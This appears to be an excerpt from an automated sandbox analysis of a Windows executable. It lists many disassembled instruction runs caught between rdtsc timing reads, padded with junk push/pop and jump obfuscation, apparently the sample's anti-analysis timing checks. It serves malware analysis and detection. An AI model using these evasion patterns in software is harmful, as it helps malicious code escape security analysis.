Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E5371F second address: E537BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F2F08D1BEB6h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 0C595239h 0x00000012 mov si, bx 0x00000015 call 00007F2F08D1BEA9h 0x0000001a jmp 00007F2F08D1BEB4h 0x0000001f push eax 0x00000020 pushad 0x00000021 push ebx 0x00000022 pushad 0x00000023 popad 0x00000024 pop ebx 0x00000025 push ecx 0x00000026 jmp 00007F2F08D1BEB9h 0x0000002b pop ecx 0x0000002c popad 0x0000002d mov eax, dword ptr [esp+04h] 0x00000031 push esi 0x00000032 jnp 00007F2F08D1BEA8h 0x00000038 push ecx 0x00000039 pop ecx 0x0000003a pop esi 0x0000003b mov eax, dword ptr [eax] 0x0000003d push esi 0x0000003e jmp 00007F2F08D1BEB7h 0x00000043 pop esi 0x00000044 mov dword ptr [esp+04h], eax 0x00000048 push eax 0x00000049 push edx 0x0000004a jl 00007F2F08D1BEA8h 0x00000050 push esi 0x00000051 pop esi 0x00000052 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E538C7 second address: E538CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E538CB second address: E538D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E53D83 second address: E53D88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E53EE8 second address: E53EEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E53EEE second address: E53EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E54585 second address: E54589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E54589 second address: E545A0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2F08CCF066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jnc 00007F2F08CCF066h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E545A0 second address: E545A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E546A8 second address: E546AE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E549ED second address: E54A0A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2F08D1BEA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 popad 0x00000011 nop 0x00000012 mov edi, eax 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 pop eax 0x0000001a push esi 0x0000001b pop esi 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E09FDC second address: E09FE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F2F08CCF066h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E09FE9 second address: E0A010 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2F08D1BEBFh 0x00000008 jmp 00007F2F08D1BEABh 0x0000000d jmp 00007F2F08D1BEAEh 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E0A010 second address: E0A014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E57F38 second address: E57F46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E57FF6 second address: E57FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E57FFA second address: E58011 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08D1BEB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E58011 second address: E58017 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E59465 second address: E59482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2F08D1BEB8h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E59482 second address: E594DA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F2F08CCF073h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e add esi, dword ptr [ebp+122D2B29h] 0x00000014 push 00000000h 0x00000016 jng 00007F2F08CCF067h 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007F2F08CCF068h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 00000016h 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 xchg eax, ebx 0x00000039 pushad 0x0000003a push ebx 0x0000003b jns 00007F2F08CCF066h 0x00000041 pop ebx 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E5A9B3 second address: E5AA1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnp 00007F2F08D1BEA8h 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F2F08D1BEA8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 xor dword ptr [ebp+12471677h], esi 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007F2F08D1BEA8h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 00000017h 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 mov esi, ecx 0x0000004b sub esi, 7FB405ACh 0x00000051 push 00000000h 0x00000053 or dword ptr [ebp+1245D9BAh], eax 0x00000059 xchg eax, ebx 0x0000005a push ecx 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E5AA1F second address: E5AA25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E5AA25 second address: E5AA32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E5AA32 second address: E5AA3C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2F08CCF06Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E5B516 second address: E5B5A0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2F08D1BEA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F2F08D1BEA8h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 jmp 00007F2F08D1BEB9h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ecx 0x00000034 call 00007F2F08D1BEA8h 0x00000039 pop ecx 0x0000003a mov dword ptr [esp+04h], ecx 0x0000003e add dword ptr [esp+04h], 0000001Ah 0x00000046 inc ecx 0x00000047 push ecx 0x00000048 ret 0x00000049 pop ecx 0x0000004a ret 0x0000004b xchg eax, ebx 0x0000004c ja 00007F2F08D1BEAAh 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F2F08D1BEB3h 0x0000005a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E5B5A0 second address: E5B5A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E5D24F second address: E5D26F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 jnp 00007F2F08D1BEA6h 0x0000000e pop ecx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F2F08D1BEACh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E60C3E second address: E60C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E61CC6 second address: E61CCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E61CCC second address: E61CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E61CDA second address: E61CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E61CDF second address: E61CE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E61CE5 second address: E61CE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E61D8D second address: E61DB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF078h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F2F08CCF066h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E61DB1 second address: E61DD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08D1BEB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F2F08D1BEA6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E62E56 second address: E62E67 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E61F03 second address: E61F09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E630EA second address: E630EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E630EF second address: E630F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E6437C second address: E64381 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E65360 second address: E65374 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08D1BEB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E6643D second address: E66441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E6654F second address: E66555 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E6845C second address: E68466 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2F08CCF066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E69476 second address: E6947A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E6947A second address: E69480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E69688 second address: E6968F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E6B570 second address: E6B57A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F2F08CCF066h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E6E419 second address: E6E438 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2F08D1BEB2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E76B28 second address: E76B32 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2F08CCF066h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E76B32 second address: E76B49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2F08D1BEABh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E76B49 second address: E76B7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF06Dh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F2F08CCF083h 0x00000011 jmp 00007F2F08CCF077h 0x00000016 jbe 00007F2F08CCF066h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E76B7F second address: E76B87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E76B87 second address: E76B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E76E55 second address: E76E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E76E5E second address: E76E6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F2F08CCF06Eh 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E76FD3 second address: E76FDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E76FDC second address: E77001 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF06Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F2F08CCF072h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E7BC11 second address: E7BC45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08D1BEACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c je 00007F2F08D1BEA6h 0x00000012 pop ebx 0x00000013 pushad 0x00000014 jl 00007F2F08D1BEA6h 0x0000001a push eax 0x0000001b pop eax 0x0000001c popad 0x0000001d popad 0x0000001e mov eax, dword ptr [esp+04h] 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 jnc 00007F2F08D1BEA6h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E7BC45 second address: E7BC4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E7BC4A second address: E7BC6A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jbe 00007F2F08D1BEA6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push ebx 0x0000000f jne 00007F2F08D1BEA8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E7BD4B second address: E7BD50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E7BD50 second address: E7BD55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E7FEA3 second address: E7FEBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F2F08CCF066h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jc 00007F2F08CCF084h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E8060A second address: E8063C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jne 00007F2F08D1BEA6h 0x0000000b jmp 00007F2F08D1BEB9h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jc 00007F2F08D1BEAEh 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E8063C second address: E80643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E80643 second address: E8064D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E80762 second address: E80766 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E80766 second address: E8077E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2F08D1BEB2h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E8077E second address: E807A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF077h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F2F08CCF068h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E80FE2 second address: E80FEC instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2F08D1BEA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E85168 second address: E85177 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF06Ah 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E03430 second address: E03440 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a jc 00007F2F08D1BEA6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E03440 second address: E03444 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E894D3 second address: E894E2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 je 00007F2F08D1BEA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E894E2 second address: E894EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F2F08CCF066h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E894EE second address: E894F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E894F3 second address: E894F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E894F9 second address: E894FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E89F45 second address: E89F5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2F08CCF075h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E89F5E second address: E89F69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F2F08D1BEA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E89F69 second address: E89F6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E8A336 second address: E8A33C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
